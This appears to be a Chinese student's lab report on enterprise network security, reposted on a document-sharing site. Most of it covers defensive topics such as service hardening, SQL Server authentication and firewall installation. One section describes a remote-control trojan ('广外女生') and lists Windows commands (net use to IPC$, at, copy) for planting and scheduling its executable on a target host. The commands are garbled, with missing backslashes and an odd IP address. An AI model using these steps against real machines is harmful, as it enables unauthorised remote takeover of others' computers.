【企业网络】网络信息安全报告由刀豆文库小编整理,希望给你工作、学习、生活带来方便,猜你可能喜欢“网络信息安全报告”。
XX中型企业网安全 网络信息安全报告
一、实验目的及要求
该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。
本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。
二、专周内容
1、安全需求分析
(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:
A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理
(2)解决网络安全问题的一些要求
A、大幅度地提高系统的安全性(重点是可用性和可控性);
B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;
C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;
D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;
E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;
F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;
(3)系统安全目标
A、建立一套完整可行的网络安全与网络管理策略;
B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;
C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;
D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;
E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;
F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;
2、网络拓扑
3、网络安全的基本内容
(1)基本网络命令
A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。
B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:
C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
(2)操作系统安全
A、屏蔽不需要的服务组件
开始——程序——管理工具——服务 出现以下窗口:
然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”
(3)数据库系统安全
A、使用安全的帐号策略和Windows认证模式
由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。
SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。
Windows认证模式比混合模式更优越,原因在以下:
1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。
2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。
3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。
4)Windows认证意味着你只需要将密码存放在一个地方。
要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装
1.具体操作如下:
第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;
第二步:
在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;
第三步: 在“软件许可协议”对话框,接受协议点击“是”;
第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;
第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;
第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;
第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;
第八步: 单击“下一步”按钮,系统开始复制文件;
第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。
相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。
点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:
网络监控中心:
(5)网络攻击工具:“广外女生”
它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。
主要步骤:首先运行“gwg.exe”,出现如图窗口:
选中“服务端设置”,生成“GDUFS.exe”木马:
然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:
“开始”——“运行”——“cmd”
命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系
命令:net time 191.168.12.38 获取目标主机的时间
命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道
命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:
命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。
三、专周小结:
通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。
网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。
网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。
至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:
1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。
2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。
4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。
感谢老师对我们的教导。
企业网络信息安全解决方案一、信息安全化定义企业信息安全管理即针对当前企业面临的病毒泛滥、黑客入侵、恶意软件、信息失控等复杂的应用环境制定相应的防御措施,保护企业信......
网络信息安全信息安全是指为建立信息处理系统而采取的技术上和管理上的安全保护,以实现电子信息的保密性、完整性、可用性和可控性。当今信息时代,计算机网络已经成为一种不可......
刀豆文库小编为你整合推荐7篇网络信息安全整改报告,也许这些就是您需要的文章,但愿刀豆文库能带给您一些学习、工作上的帮助。......
网络信息安全整改报告随着个人的文明素养不断提升,报告使用的次数愈发增长,报告具有语言陈述性的特点。我们应当如何写报告呢?下面是小编为大家整理的网络信息安全整改报告,仅供......
计算机信息安全评估报告如何实现如下图所示可用性1.人们通常采用一些技术措施或网络安全设备来实现这些目标。例如:使用防火墙,把攻击者阻挡在网络外部,让他们“迚不来”。即使......